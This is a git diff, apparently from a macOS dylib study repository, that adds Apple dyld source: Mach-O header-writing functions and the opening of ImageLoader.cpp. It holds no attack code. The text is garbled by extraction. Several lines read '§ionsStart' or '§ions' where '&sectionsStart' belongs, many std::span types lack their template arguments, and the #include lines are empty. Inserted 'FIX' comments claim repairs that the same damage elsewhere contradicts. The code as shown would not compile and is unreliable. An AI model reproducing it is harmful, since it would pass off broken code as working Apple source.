MH_MAGIC_64 : MH_MAGIC; + mh.filetype = filetype; + mh.ncmds = 0; + mh.sizeofcmds = 0; + mh.flags = flags; + arch.set(mh); + } + if ( addImplicitTextSegment && (filetype != MH_OBJECT) ) { + SegmentInfo segInfo { .segmentName="__TEXT", .vmaddr=0, .vmsize=0x1000, .fileOffset=0, .fileSize=0x1000, .perms=(VM_PROT_READ | VM_PROT_EXECUTE) }; + header.addSegment(segInfo, std::array { "__text" }); + } + + return &header; +} + +void Header::save(char savedPath[PATH_MAX]) const +{ + ::strcpy(savedPath, "/tmp/mocko-XXXXXX"); + int fd = ::mkstemp(savedPath); + if ( fd != -1 ) { + ::pwrite(fd, this, sizeof(Header), 0); + ::close(fd); + } +} + +uint32_t Header::pointerAligned(uint32_t value) const +{ + // mach-o requires all load command sizes to be a multiple the pointer size + if ( is64() ) + return ((value + 7) & (-8)); + else + return ((value + 3) & (-4)); +} + +load_command* Header::firstLoadCommand() +{ + if ( mh.magic == MH_MAGIC ) + return (load_command*)((uint8_t*)this + sizeof(mach_header)); + else + return (load_command*)((uint8_t*)this + sizeof(mach_header_64)); +} + +// creates space for a new load command, but does not fill in its payload +load_command* Header::appendLoadCommand(uint32_t cmd, uint32_t cmdSize) +{ + load_command* thisCmd = (load_command*)((uint8_t*)firstLoadCommand() + mh.sizeofcmds); + thisCmd->cmd = cmd; + thisCmd->cmdsize = cmdSize; + mh.ncmds += 1; + mh.sizeofcmds += cmdSize; + + return thisCmd; +} + +// copies a new load command from another +void Header::appendLoadCommand(const load_command* lc) +{ + load_command* thisCmd = (load_command*)((uint8_t*)firstLoadCommand() + mh.sizeofcmds); + ::memcpy(thisCmd, lc, lc->cmdsize); + mh.ncmds += 1; + mh.sizeofcmds += lc->cmdsize; +} + +void Header::addBuildVersion(Platform platform, Version32 minOS, Version32 sdk, std::span tools) +{ + assert(platform != Platform::zippered && "can't add a build command for Platform::zippered, it must be split"); + uint32_t lcSize = 
(uint32_t)(sizeof(build_version_command) + tools.size() * sizeof(build_tool_version)); + build_version_command* bv = (build_version_command*)appendLoadCommand(LC_BUILD_VERSION, lcSize); + bv->platform = platform.value(); + bv->minos = minOS.value(); + bv->sdk = sdk.value(); + bv->ntools = (uint32_t)tools.size(); + if ( bv->ntools != 0 ) + memcpy((uint8_t*)bv + sizeof(build_version_command), &tools[0], tools.size() * sizeof(build_tool_version)); +} + +void Header::addMinVersion(Platform platform, Version32 minOS, Version32 sdk) +{ + version_min_command vc; + vc.cmdsize = sizeof(version_min_command); + vc.version = minOS.value(); + vc.sdk = sdk.value(); + if ( platform == Platform::macOS ) + vc.cmd = LC_VERSION_MIN_MACOSX; + else if ( platform == Platform::iOS ) + vc.cmd = LC_VERSION_MIN_IPHONEOS; + else if ( platform == Platform::watchOS ) + vc.cmd = LC_VERSION_MIN_WATCHOS; + else if ( platform == Platform::tvOS ) + vc.cmd = LC_VERSION_MIN_TVOS; + else + assert(0 && "unknown platform"); + appendLoadCommand((load_command*)&vc); +} + +void Header::setHasThreadLocalVariables() +{ + assert(mh.filetype != MH_OBJECT); + mh.flags |= MH_HAS_TLV_DESCRIPTORS; +} + +void Header::setHasWeakDefs() +{ + assert(mh.filetype != MH_OBJECT); + mh.flags |= MH_WEAK_DEFINES; +} + +void Header::setUsesWeakDefs() +{ + assert(mh.filetype != MH_OBJECT); + mh.flags |= MH_BINDS_TO_WEAK; +} + +void Header::setAppExtensionSafe() +{ + assert(mh.filetype == MH_DYLIB); + mh.flags |= MH_APP_EXTENSION_SAFE; +} + +void Header::setSimSupport() +{ + assert(mh.filetype == MH_DYLIB); + mh.flags |= MH_SIM_SUPPORT; +} + +void Header::setNoReExportedDylibs() +{ + assert(mh.filetype == MH_DYLIB); + mh.flags |= MH_NO_REEXPORTED_DYLIBS; +} + +void Header::addPlatformInfo(Platform platform, Version32 minOS, Version32 sdk, std::span tools) +{ + Architecture arch(&mh); + Policy policy(arch, { platform, minOS, sdk }, mh.filetype); + switch ( policy.useBuildVersionLoadCommand() ) { + case Policy::preferUse: + case 
Policy::mustUse:
            // three macOS dylibs under libSystem need to be built with old load commands to support old simulator runtimes
            if ( isSimSupport() && (platform == Platform::macOS) && ((arch == Architecture::x86_64) || (arch == Architecture::i386)) )
                addMinVersion(platform, minOS, sdk);
            else
                addBuildVersion(platform, minOS, sdk, tools);
            break;
        case Policy::preferDontUse:
        case Policy::mustNotUse:
            addMinVersion(platform, minOS, sdk);
            break;
    }
}

// Appends an LC_UUID command whose value is all zeros.
void Header::addNullUUID()
{
    uuid_command uc;
    uc.cmd = LC_UUID;
    uc.cmdsize = sizeof(uuid_command);
    bzero(uc.uuid, 16);
    appendLoadCommand((load_command*)&uc);
}

// Appends an LC_UUID command with a random UUID; optionally copies the new
// UUID out through `copyOfUUID`.
void Header::addUniqueUUID(uuid_t copyOfUUID)
{
    uuid_command uc;
    uc.cmd = LC_UUID;
    uc.cmdsize = sizeof(uuid_command);
    uuid_generate_random(uc.uuid);
    appendLoadCommand((load_command*)&uc);
    if ( copyOfUUID )
        memcpy(copyOfUUID, uc.uuid, sizeof(uuid_t));
}

// Overwrites the value of an existing LC_UUID command in place.
void Header::updateUUID(uuid_t uuid)
{
    __block bool found = false;
    forEachLoadCommandSafe(^(const load_command *cmd, bool &stop) {
        if ( cmd->cmd == LC_UUID ) {
            memcpy(((uuid_command*)cmd)->uuid, uuid, 16);
            found = true;
            stop = true;
        }
    });
    assert(found && "updateUUID called without a LC_UUID command");
}

// Appends an LC_SEGMENT(_64) command with empty section headers named after
// `sectionNames` (section fields other than names are left for updateSection).
// FIX: restored the stripped template argument in std::span<const char* const>.
void Header::addSegment(const SegmentInfo& info, std::span<const char* const> sectionNames)
{
    if ( is64() ) {
        uint32_t lcSize = (uint32_t)(sizeof(segment_command_64) + sectionNames.size() * sizeof(section_64));
        segment_command_64* sc = (segment_command_64*)appendLoadCommand(LC_SEGMENT_64, lcSize);
        strncpy(sc->segname, info.segmentName.data(), 16); // segname is a fixed char[16]; may legitimately be unterminated
        sc->vmaddr = info.vmaddr;
        sc->vmsize = info.vmsize;
        sc->fileoff = info.fileOffset;
        sc->filesize = info.fileSize;
        sc->initprot = info.perms;
        sc->maxprot = info.perms;
        sc->nsects = (uint32_t)sectionNames.size();
        sc->flags = info.flags;
        section_64* const sect = (section_64*)((uint8_t*)sc + sizeof(struct segment_command_64));
        uint32_t sectionIndex = 0;
        for ( const char* sectName : sectionNames ) {
            strncpy(sect[sectionIndex].segname, info.segmentName.data(), 16);
            strncpy(sect[sectionIndex].sectname, sectName, 16);
            ++sectionIndex;
        }
    }
    else {
        uint32_t lcSize = (uint32_t)(sizeof(segment_command) + sectionNames.size() * sizeof(section));
        segment_command* sc = (segment_command*)appendLoadCommand(LC_SEGMENT, lcSize);
        strncpy(sc->segname, info.segmentName.data(), 16);
        sc->vmaddr = (uint32_t)info.vmaddr;
        sc->vmsize = (uint32_t)info.vmsize;
        sc->fileoff = info.fileOffset;
        sc->filesize = info.fileSize;
        sc->initprot = info.perms;
        sc->maxprot = info.perms;
        sc->nsects = (uint32_t)sectionNames.size();
        sc->flags = info.flags;
        section* const sect = (section*)((uint8_t*)sc + sizeof(struct segment_command));
        uint32_t sectionIndex = 0;
        for ( const char* sectName : sectionNames ) {
            strncpy(sect[sectionIndex].segname, info.segmentName.data(), 16);
            strncpy(sect[sectionIndex].sectname, sectName, 16);
            ++sectionIndex;
        }
    }
}

// Copies the fields of `info` into the matching section header in place.
void Header::updateSection(const SectionInfo& info)
{
    forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) {
        if ( cmd->cmd == LC_SEGMENT_64 ) {
            segment_command_64* segCmd = (segment_command_64*)cmd;
            // NOTE(review): string_view == char[16] relies on segname being
            // NUL-terminated — confirm writer-side segments always are
            if (info.segmentName == segCmd->segname) {
                section_64* const sectionsStart = (section_64*)((char*)segCmd + sizeof(struct segment_command_64));
                // FIX: repaired mojibake "§ionsStart" (HTML-entity damage of "&sectionsStart")
                section_64* const sectionsEnd = &sectionsStart[segCmd->nsects];
                for ( section_64* sect=sectionsStart; sect < sectionsEnd; ++sect ) {
                    if ( strncmp(info.sectionName.data(), sect->sectname, 16) == 0 ) {
                        sect->addr = info.address;
                        sect->size = info.size;
                        sect->offset = info.fileOffset;
                        sect->align = info.alignment;
                        sect->reloff = info.relocsOffset;
                        sect->nreloc = info.relocsCount;
                        sect->flags = info.flags;
                        sect->reserved1 = info.reserved1;
                        sect->reserved2 = info.reserved2;
                        sect->reserved3 = 0;
                        stop = true;
                        return;
                    }
                }
            }
        }
        else if ( cmd->cmd == LC_SEGMENT ) {
            segment_command* segCmd = (segment_command*)cmd;
+ if (info.segmentName == segCmd->segname) { + section* const sectionsStart = (section*)((char*)segCmd + sizeof(struct segment_command)); + section* const sectionsEnd = §ionsStart[segCmd->nsects]; + for ( section* sect=sectionsStart; sect < sectionsEnd; ++sect ) { + if ( strncmp(info.sectionName.data(), sect->sectname, 16) == 0 ) { + sect->addr = (uint32_t)info.address; + sect->size = (uint32_t)info.size; + sect->offset = info.fileOffset; + sect->align = info.alignment; + sect->reloff = info.relocsOffset; + sect->nreloc = info.relocsCount; + sect->flags = info.flags; + sect->reserved1 = info.reserved1; + sect->reserved2 = info.reserved2; + stop = true; + return; + } + } + } + } + }); +} + +void Header::updateSegment(const SegmentInfo& info) +{ + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_SEGMENT_64 ) { + segment_command_64* segCmd = (segment_command_64*)cmd; + if (info.segmentName == segCmd->segname) { + segCmd->vmaddr = info.vmaddr; + segCmd->vmsize = info.vmsize; + segCmd->fileoff = info.fileOffset; + segCmd->filesize = info.fileSize; + segCmd->initprot = info.perms; + segCmd->maxprot = info.perms; + stop = true; + return; + } + } + else if ( cmd->cmd == LC_SEGMENT ) { + segment_command* segCmd = (segment_command*)cmd; + if (info.segmentName == segCmd->segname) { + segCmd->vmaddr = (uint32_t)info.vmaddr; + segCmd->vmsize = (uint32_t)info.vmsize; + segCmd->fileoff = info.fileOffset; + segCmd->filesize = info.fileSize; + segCmd->initprot = info.perms; + segCmd->maxprot = info.perms; + stop = true; + return; + } + } + }); +} + + +void Header::addInstallName(const char* name, Version32 compatVers, Version32 currentVersion) +{ + uint32_t alignedSize = pointerAligned((uint32_t)(sizeof(dylib_command) + strlen(name) + 1)); + dylib_command* ic = (dylib_command*)appendLoadCommand(LC_ID_DYLIB, alignedSize); + ic->dylib.name.offset = sizeof(dylib_command); + ic->dylib.current_version = currentVersion.value(); + 
ic->dylib.compatibility_version = compatVers.value(); + strcpy((char*)ic + ic->dylib.name.offset, name); +} + +void Header::addDependentDylib(const char* path, bool isWeak, bool isUpward, bool isReexport, Version32 compatVers, Version32 currentVersion) +{ + uint32_t alignedSize = pointerAligned((uint32_t)(sizeof(dylib_command) + strlen(path) + 1)); + dylib_command* dc = (dylib_command*)appendLoadCommand(LC_LOAD_DYLIB, alignedSize); + if ( isReexport ) + dc->cmd = LC_REEXPORT_DYLIB; + else if ( isUpward ) + dc->cmd = LC_LOAD_UPWARD_DYLIB; + else if ( isWeak ) + dc->cmd = LC_LOAD_WEAK_DYLIB; + dc->dylib.name.offset = sizeof(dylib_command); + dc->dylib.current_version = currentVersion.value(); + dc->dylib.compatibility_version = compatVers.value(); + dc->dylib.timestamp = 2; // needs to be some constant value that is different than dylib id load command + strcpy((char*)dc + dc->dylib.name.offset, path); +} + +void Header::addLibSystem() +{ + addDependentDylib("/usr/lib/libSystem.B.dylib"); +} + +void Header::addDylibId(CString name, Version32 compatVers, Version32 currentVersion) +{ + uint32_t alignedSize = pointerAligned((uint32_t)(sizeof(dylib_command) + name.size() + 1)); + dylib_command* dc = (dylib_command*)appendLoadCommand(LC_ID_DYLIB, alignedSize); + dc->dylib.name.offset = sizeof(dylib_command); + dc->dylib.timestamp = 1; // needs to be some constant value that is different than dependent dylib + dc->dylib.current_version = currentVersion.value(); + dc->dylib.compatibility_version = compatVers.value(); + strcpy((char*)dc + dc->dylib.name.offset, name.c_str()); +} + +void Header::addDyldID() +{ + const char* path = "/usr/lib/dyld"; + uint32_t alignedSize = pointerAligned((uint32_t)(sizeof(dylinker_command) + strlen(path) + 1)); + dylinker_command* dc = (dylinker_command*)appendLoadCommand(LC_ID_DYLINKER, alignedSize); + dc->name.offset = sizeof(dylinker_command); + strcpy((char*)dc + dc->name.offset, path); +} + +void Header::addDynamicLinker() +{ + const 
char* path = "/usr/lib/dyld"; + uint32_t alignedSize = pointerAligned((uint32_t)(sizeof(dylinker_command) + strlen(path) + 1)); + dylinker_command* dc = (dylinker_command*)appendLoadCommand(LC_LOAD_DYLINKER, alignedSize); + dc->name.offset = sizeof(dylinker_command); + strcpy((char*)dc + dc->name.offset, path); +} + +void Header::addFairPlayEncrypted(uint32_t offset, uint32_t size) +{ + if ( is64() ) { + encryption_info_command_64 en64; + en64.cmd = LC_ENCRYPTION_INFO_64; + en64.cmdsize = sizeof(encryption_info_command_64); + en64.cryptoff = offset; + en64.cryptsize = size; + en64.cryptid = 0; + en64.pad = 0; + appendLoadCommand((load_command*)&en64); + } + else { + encryption_info_command en32; + en32.cmd = LC_ENCRYPTION_INFO; + en32.cmdsize = sizeof(encryption_info_command); + en32.cryptoff = offset; + en32.cryptsize = size; + en32.cryptid = 0; + appendLoadCommand((load_command*)&en32); + } +} + +void Header::addRPath(const char* path) +{ + uint32_t alignedSize = pointerAligned((uint32_t)(sizeof(rpath_command) + strlen(path) + 1)); + rpath_command* rc = (rpath_command*)appendLoadCommand(LC_RPATH, alignedSize); + rc->path.offset = sizeof(rpath_command); + strcpy((char*)rc + rc->path.offset, path); +} + +void Header::addDyldEnvVar(const char* path) +{ + uint32_t alignedSize = pointerAligned((uint32_t)(sizeof(dylinker_command) + strlen(path) + 1)); + dylinker_command* dc = (dylinker_command*)appendLoadCommand(LC_DYLD_ENVIRONMENT, alignedSize); + dc->name.offset = sizeof(dylinker_command); + strcpy((char*)dc + dc->name.offset, path); +} + +void Header::addAllowableClient(const char* clientName) +{ + uint32_t alignedSize = pointerAligned((uint32_t)(sizeof(sub_client_command) + strlen(clientName) + 1)); + sub_client_command* ac = (sub_client_command*)appendLoadCommand(LC_SUB_CLIENT, alignedSize); + ac->client.offset = sizeof(sub_client_command); + strcpy((char*)ac + ac->client.offset, clientName); +} + +void Header::addUmbrellaName(const char* umbrellaName) +{ + 
uint32_t alignedSize = pointerAligned((uint32_t)(sizeof(sub_framework_command) + strlen(umbrellaName) + 1)); + sub_framework_command* ac = (sub_framework_command*)appendLoadCommand(LC_SUB_FRAMEWORK, alignedSize); + ac->umbrella.offset = sizeof(sub_framework_command); + strcpy((char*)ac + ac->umbrella.offset, umbrellaName); +} + +void Header::addSourceVersion(Version64 vers) +{ + source_version_command svc; + svc.cmd = LC_SOURCE_VERSION; + svc.cmdsize = sizeof(source_version_command); + svc.version = vers.value(); + appendLoadCommand((load_command*)&svc); +} + +void Header::setMain(uint32_t offset) +{ + entry_point_command ec; + ec.cmd = LC_MAIN; + ec.cmdsize = sizeof(entry_point_command); + ec.entryoff = offset; + ec.stacksize = 0; + appendLoadCommand((load_command*)&ec); +} + +void Header::setCustomStackSize(uint64_t stackSize) { + __block bool found = false; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if (cmd->cmd == LC_MAIN) { + entry_point_command* ec = (entry_point_command*)cmd; + ec->stacksize = stackSize; + found = true; + stop = true; + } + }); + assert(found); +} + +void Header::setUnixEntry(uint64_t startAddr) +{ + // FIXME: support other archs + if ( (mh.cputype == CPU_TYPE_ARM64) || (mh.cputype == CPU_TYPE_ARM64_32) ) { + uint32_t lcSize = 288; + uint32_t* words = (uint32_t*)appendLoadCommand(LC_UNIXTHREAD, lcSize); + words[2] = 6; // flavor = ARM_THREAD_STATE64 + words[3] = 68; // count = ARM_EXCEPTION_STATE64_COUNT + bzero(&words[4], lcSize-16); + *(uint64_t*)(&words[68]) = startAddr; // register pc = startAddr + } + else if ( mh.cputype == CPU_TYPE_X86_64 ) { + uint32_t lcSize = 184; + uint32_t* words = (uint32_t*)appendLoadCommand(LC_UNIXTHREAD, lcSize); + words[2] = 4; // flavor = x86_THREAD_STATE64 + words[3] = 42; // count = x86_THREAD_STATE64_COUNT + bzero(&words[4], lcSize-16); + *(uint64_t*)(&words[36]) = startAddr; // register pc = startAddr + } + else { + assert(0 && "arch not supported"); + } +} + +void 
Header::addCodeSignature(uint32_t fileOffset, uint32_t fileSize) +{ + linkedit_data_command lc; + lc.cmd = LC_CODE_SIGNATURE; + lc.cmdsize = sizeof(linkedit_data_command); + lc.dataoff = fileOffset; + lc.datasize = fileSize; + appendLoadCommand((load_command*)&lc); +} + +void Header::setBindOpcodesInfo(uint32_t rebaseOffset, uint32_t rebaseSize, + uint32_t bindsOffset, uint32_t bindsSize, + uint32_t weakBindsOffset, uint32_t weakBindsSize, + uint32_t lazyBindsOffset, uint32_t lazyBindsSize, + uint32_t exportTrieOffset, uint32_t exportTrieSize) +{ + dyld_info_command lc; + lc.cmd = LC_DYLD_INFO_ONLY; + lc.cmdsize = sizeof(dyld_info_command); + lc.rebase_off = rebaseOffset; + lc.rebase_size = rebaseSize; + lc.bind_off = bindsOffset; + lc.bind_size = bindsSize; + lc.weak_bind_off = weakBindsOffset; + lc.weak_bind_size = weakBindsSize; + lc.lazy_bind_off = lazyBindsOffset; + lc.lazy_bind_size = lazyBindsSize; + lc.export_off = exportTrieOffset; + lc.export_size = exportTrieSize; + appendLoadCommand((load_command*)&lc); +} + +void Header::setChainedFixupsInfo(uint32_t cfOffset, uint32_t cfSize) +{ + linkedit_data_command lc; + lc.cmd = LC_DYLD_CHAINED_FIXUPS; + lc.cmdsize = sizeof(linkedit_data_command); + lc.dataoff = cfOffset; + lc.datasize = cfSize; + appendLoadCommand((load_command*)&lc); +} + +void Header::setExportTrieInfo(uint32_t offset, uint32_t size) +{ + linkedit_data_command lc; + lc.cmd = LC_DYLD_EXPORTS_TRIE; + lc.cmdsize = sizeof(linkedit_data_command); + lc.dataoff = offset; + lc.datasize = size; + appendLoadCommand((load_command*)&lc); +} + +void Header::setSplitSegInfo(uint32_t offset, uint32_t size) +{ + linkedit_data_command lc; + lc.cmd = LC_SEGMENT_SPLIT_INFO; + lc.cmdsize = sizeof(linkedit_data_command); + lc.dataoff = offset; + lc.datasize = size; + appendLoadCommand((load_command*)&lc); +} + +void Header::setDataInCode(uint32_t offset, uint32_t size) +{ + linkedit_data_command lc; + lc.cmd = LC_DATA_IN_CODE; + lc.cmdsize = 
sizeof(linkedit_data_command); + lc.dataoff = offset; + lc.datasize = size; + appendLoadCommand((load_command*)&lc); +} + +void Header::setFunctionStarts(uint32_t offset, uint32_t size) +{ + linkedit_data_command lc; + lc.cmd = LC_FUNCTION_STARTS; + lc.cmdsize = sizeof(linkedit_data_command); + lc.dataoff = offset; + lc.datasize = size; + appendLoadCommand((load_command*)&lc); +} + +void Header::setAtomInfo(uint32_t offset, uint32_t size) +{ + linkedit_data_command lc; + lc.cmd = LC_ATOM_INFO; + lc.cmdsize = sizeof(linkedit_data_command); + lc.dataoff = offset; + lc.datasize = size; + appendLoadCommand((load_command*)&lc); +} + +void Header::setSymbolTable(uint32_t nlistOffset, uint32_t nlistCount, uint32_t stringPoolOffset, uint32_t stringPoolSize, + uint32_t localsCount, uint32_t globalsCount, uint32_t undefCount, uint32_t indOffset, uint32_t indCount) +{ + symtab_command stc; + stc.cmd = LC_SYMTAB; + stc.cmdsize = sizeof(symtab_command); + stc.symoff = nlistOffset; + stc.nsyms = nlistCount; + stc.stroff = stringPoolOffset; + stc.strsize = stringPoolSize; + appendLoadCommand((load_command*)&stc); + + dysymtab_command dstc; + bzero(&dstc, sizeof(dstc)); + dstc.cmd = LC_DYSYMTAB; + dstc.cmdsize = sizeof(dysymtab_command); + dstc.ilocalsym = 0; + dstc.nlocalsym = localsCount; + dstc.iextdefsym = localsCount; + dstc.nextdefsym = globalsCount; + dstc.iundefsym = localsCount+globalsCount; + dstc.nundefsym = undefCount; + dstc.indirectsymoff = indOffset; + dstc.nindirectsyms = indCount; + appendLoadCommand((load_command*)&dstc); +} + +void Header::addLinkerOption(std::span buffer, uint32_t count) +{ + uint32_t cmdSize = pointerAligned(sizeof(linker_option_command) + (uint32_t)buffer.size()); + + linker_option_command* lc = (linker_option_command*)appendLoadCommand(LC_LINKER_OPTION, cmdSize); + lc->cmd = LC_LINKER_OPTION; + lc->cmdsize = cmdSize; + lc->count = count; + memcpy((uint8_t*)(lc + 1), buffer.data(), buffer.size()); +} + +Header::LinkerOption 
Header::LinkerOption::make(std::span opts) +{ + LinkerOption out; + out.count = (uint32_t)opts.size(); + assert(out.count == opts.size()); + for ( CString option : opts ) { + if ( option.empty() ) + continue; + size_t previousSize = out.buffer.size(); + out.buffer.resize(previousSize + option.size() + 1); + option.strcpy((char*)out.buffer.data() + previousSize); + } + return out; +} + +load_command* Header::findLoadCommand(uint32_t cmdNum) +{ + __block load_command* result = nullptr; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == cmdNum ) { + result = (load_command*)cmd; + stop = true; + } + }); + return result; +} + +void Header::removeLoadCommand(void (^callback)(const load_command* cmd, bool& remove, bool& stop)) +{ + bool stop = false; + const load_command* startCmds = nullptr; + if ( mh.magic == MH_MAGIC_64 ) + startCmds = (load_command*)((char*)this + sizeof(mach_header_64)); + else if ( mh.magic == MH_MAGIC ) + startCmds = (load_command*)((char*)this + sizeof(mach_header)); + else if ( hasMachOBigEndianMagic() ) + return; // can't process big endian mach-o + else { + //const uint32_t* h = (uint32_t*)this; + //diag.error("file does not start with MH_MAGIC[_64]: 0x%08X 0x%08X", h[0], h [1]); + return; // not a mach-o file + } + const load_command* const cmdsEnd = (load_command*)((char*)startCmds + mh.sizeofcmds); + auto cmd = (load_command*)startCmds; + const uint32_t origNcmds = mh.ncmds; + unsigned bytesRemaining = mh.sizeofcmds; + for ( uint32_t i = 0; i < origNcmds; ++i ) { + bool remove = false; + auto nextCmd = (load_command*)((char*)cmd + cmd->cmdsize); + if ( cmd->cmdsize < 8 ) { + //diag.error("malformed load command #%d of %d at %p with mh=%p, size (0x%X) too small", i, mh.ncmds, cmd, this, cmd->cmdsize); + return; + } + if ( (nextCmd > cmdsEnd) || (nextCmd < startCmds) ) { + //diag.error("malformed load command #%d of %d at %p with mh=%p, size (0x%X) is too large, load commands end at %p", i, mh.ncmds, cmd, 
this, cmd->cmdsize, cmdsEnd); + return; + } + callback(cmd, remove, stop); + if ( remove ) { + mh.sizeofcmds -= cmd->cmdsize; + ::memmove((void*)cmd, (void*)nextCmd, bytesRemaining); + mh.ncmds--; + } + else { + bytesRemaining -= cmd->cmdsize; + cmd = nextCmd; + } + if ( stop ) + break; + } + if ( cmd ) + ::bzero(cmd, bytesRemaining); +} + +uint32_t Header::relocatableHeaderAndLoadCommandsSize(bool is64, uint32_t sectionCount, uint32_t platformsCount, std::span linkerOptions) +{ + uint32_t size = 0; + if ( is64 ) { + size += sizeof(mach_header_64); + size += sizeof(segment_command_64); + size += sizeof(section_64) * sectionCount; + } + else { + size += sizeof(mach_header); + size += sizeof(segment_command); + size += sizeof(section) * sectionCount; + } + size += sizeof(symtab_command); + size += sizeof(dysymtab_command); + size += sizeof(build_version_command) * platformsCount; + size += sizeof(linkedit_data_command); + + for ( Header::LinkerOption opt : linkerOptions ) { + size += opt.lcSize(); + } + return size; +} + +void Header::setRelocatableSectionCount(uint32_t sectionCount) +{ + assert(mh.filetype == MH_OBJECT); + if ( is64() ) { + uint32_t lcSize = (uint32_t)(sizeof(segment_command_64) + sectionCount * sizeof(section_64)); + segment_command_64* sc = (segment_command_64*)appendLoadCommand(LC_SEGMENT_64, lcSize); + sc->segname[0] = '\0'; // MH_OBJECT has one segment with no name + sc->vmaddr = 0; + sc->vmsize = 0; // adjusted in updateRelocatableSegmentSize() + sc->fileoff = 0; + sc->filesize = 0; // adjusted in updateRelocatableSegmentSize() + sc->initprot = 7; + sc->maxprot = 7; + sc->nsects = sectionCount; + // section info to be filled in later by setRelocatableSectionInfo() + bzero((uint8_t*)sc + sizeof(segment_command_64), sectionCount * sizeof(section_64)); + } + else { + uint32_t lcSize = (uint32_t)(sizeof(segment_command) + sectionCount * sizeof(section)); + segment_command* sc = (segment_command*)appendLoadCommand(LC_SEGMENT, lcSize); + 
sc->segname[0] = '\0'; // MH_OBJECT has one segment with no name + sc->vmaddr = 0; + sc->vmsize = 0x1000; // FIXME: need dynamic segment layout + sc->fileoff = 0; + sc->filesize = 0x1000; + sc->initprot = 7; + sc->maxprot = 7; + sc->nsects = sectionCount; + // section info to be filled in later by setRelocatableSectionInfo() + bzero((uint8_t*)sc + sizeof(segment_command), sectionCount * sizeof(struct section)); + } +} + +void Header::updateRelocatableSegmentSize(uint64_t vmSize, uint32_t fileSize) +{ + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_SEGMENT ) { + segment_command* sc = (segment_command*)cmd; + sc->vmsize = (uint32_t)vmSize; + sc->filesize = fileSize; + stop = true; + } + else if ( cmd->cmd == LC_SEGMENT_64 ) { + segment_command_64* sc = (segment_command_64*)cmd; + sc->vmsize = vmSize; + sc->filesize = fileSize; + stop = true; + } + }); +} + + +void Header::setRelocatableSectionInfo(uint32_t sectionIndex, const char* segName, const char* sectName, + uint32_t flags, uint64_t address, uint64_t size, uint32_t fileOffset, + uint16_t alignment, uint32_t relocsOffset, uint32_t relocsCount) +{ + __block struct section* section32 = nullptr; + __block struct section_64* section64 = nullptr; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_SEGMENT ) { + struct section* sections = (struct section*)((uint8_t*)cmd + sizeof(segment_command)); + section32 = §ions[sectionIndex]; + stop = true; + } + else if ( cmd->cmd == LC_SEGMENT_64 ) { + struct section_64* sections = (struct section_64*)((uint8_t*)cmd + sizeof(segment_command_64)); + section64 = §ions[sectionIndex]; + stop = true; + } + }); + if ( section64 != nullptr ) { + strncpy(section64->segname, segName, 16); + strncpy(section64->sectname, sectName, 16); + section64->addr = address; + section64->size = size; + section64->offset = fileOffset; + section64->align = alignment; + section64->reloff = relocsOffset; + section64->nreloc = 
relocsCount; + section64->flags = flags; + section64->reserved1 = 0; + section64->reserved2 = 0; + section64->reserved3 = 0; + } + else if ( section32 != nullptr ) { + strncpy(section32->segname, segName, 16); + strncpy(section32->sectname, sectName, 16); + section32->addr = (uint32_t)address; + section32->size = (uint32_t)size; + section32->offset = fileOffset; + section32->align = alignment; + section32->reloff = relocsOffset; + section32->nreloc = relocsCount; + section32->flags = flags; + section32->reserved1 = 0; + section32->reserved2 = 0; + } +} + +#endif // BUILDING_MACHO_WRITER + + +} // namespace dyld3 \ No newline at end of file diff --git a/IV. Dylibs/macos/ImageLoader.cpp b/IV. Dylibs/macos/ImageLoader.cpp new file mode 100644 index 0000000..4ab0ca2 --- /dev/null +++ b/IV. Dylibs/macos/ImageLoader.cpp @@ -0,0 +1,1966 @@ +// Source: https://github.com/apple-oss-distributions/dyld/blob/3f24a36068a96722cf3acbd5087983ce658e9d70/src/ImageLoader.cpp#L729 +/* -*- mode: C++; c-basic-offset: 4; tab-width: 4 -*- + * Copyright (c) 2004-2010 Apple Inc. All rights reserved. + * + * @APPLE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this + * file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. 
 *
 * @APPLE_LICENSE_HEADER_END@
 */

#define __STDC_LIMIT_MACROS
// NOTE(review): the angle-bracket header names of the following system
// includes were stripped during extraction (HTML-tag mangling) and cannot be
// recovered from this copy alone — restore from upstream ImageLoader.cpp.
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#include

#include "Tracing.h"

#include "ImageLoader.h"


// Global statistics counters, accumulated across all images loaded in-process.
uint32_t ImageLoader::fgImagesUsedFromSharedCache = 0;
uint32_t ImageLoader::fgImagesWithUsedPrebinding = 0;
uint32_t ImageLoader::fgImagesRequiringCoalescing = 0;
uint32_t ImageLoader::fgImagesHasWeakDefinitions = 0;
uint32_t ImageLoader::fgTotalRebaseFixups = 0;
uint32_t ImageLoader::fgTotalBindFixups = 0;
uint32_t ImageLoader::fgTotalBindSymbolsResolved = 0;
uint32_t ImageLoader::fgTotalBindImageSearches = 0;
uint32_t ImageLoader::fgTotalLazyBindFixups = 0;
uint32_t ImageLoader::fgTotalPossibleLazyBindFixups = 0;
uint32_t ImageLoader::fgTotalSegmentsMapped = 0;
uint64_t ImageLoader::fgTotalBytesMapped = 0;
uint64_t ImageLoader::fgTotalLoadLibrariesTime;
uint64_t ImageLoader::fgTotalObjCSetupTime = 0;
uint64_t ImageLoader::fgTotalDebuggerPausedTime = 0;
uint64_t ImageLoader::fgTotalRebindCacheTime = 0;
uint64_t ImageLoader::fgTotalRebaseTime;
uint64_t ImageLoader::fgTotalBindTime;
uint64_t ImageLoader::fgTotalWeakBindTime;
uint64_t ImageLoader::fgTotalDOF;
